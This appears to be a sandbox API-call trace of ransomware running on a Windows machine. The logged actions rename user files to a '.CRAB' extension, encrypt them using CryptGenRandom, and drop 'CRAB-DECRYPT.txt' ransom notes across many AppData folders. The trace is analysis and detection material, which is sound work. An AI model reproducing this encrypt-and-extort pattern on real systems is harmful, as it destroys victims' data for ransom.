File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, size = 1048576, size_out = 37703 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, size = 37712 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Flash Player\AssetCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Headlights\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\Dictionaries\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\Linguistics\Dictionaries\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Adobe\LogTransport2\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, size = 1048576, size_out = 83800 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, size = 83808 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\CnXo4oFZ-2lW.bmp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, size = 1048576, size_out = 40776 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, size = 40784 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\E xZj_-0MTe61j1y7.png.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, size = 1048576, size_out = 86428 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, size = 86432 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\EP00vF8FACU03CTBnmfF.odp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, size = 1048576, size_out = 35439 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, size = 35440 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\eSgmrbYFuXkNPc.jpg.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, size = 1048576, size_out = 86562 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, size = 86576 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\FxtVW3aSn.jpg.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, size = 1048576, size_out = 83148 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, size = 83152 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\GvkrGagP6w1l2HzuOg.gif.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, size = 1048576, size_out = 58373 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, size = 58384 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\h0cBvpNg ittDsph.jpg.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, size = 1048576, size_out = 102382 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, size = 102384 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\hOow2yZez.wav.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, size = 1048576, size_out = 89539 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, size = 89552 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\KDtLH1.png.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, size = 1048576, size_out = 30268 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, size = 30272 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\lZvkkvRkZTf.m4a.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 1048576, size_out = 291 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 304 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 1048576, size_out = 200704 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 200704 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.accdb.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, size = 1048576, size_out = 64 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, size = 64 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\AccessCache.laccdb.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
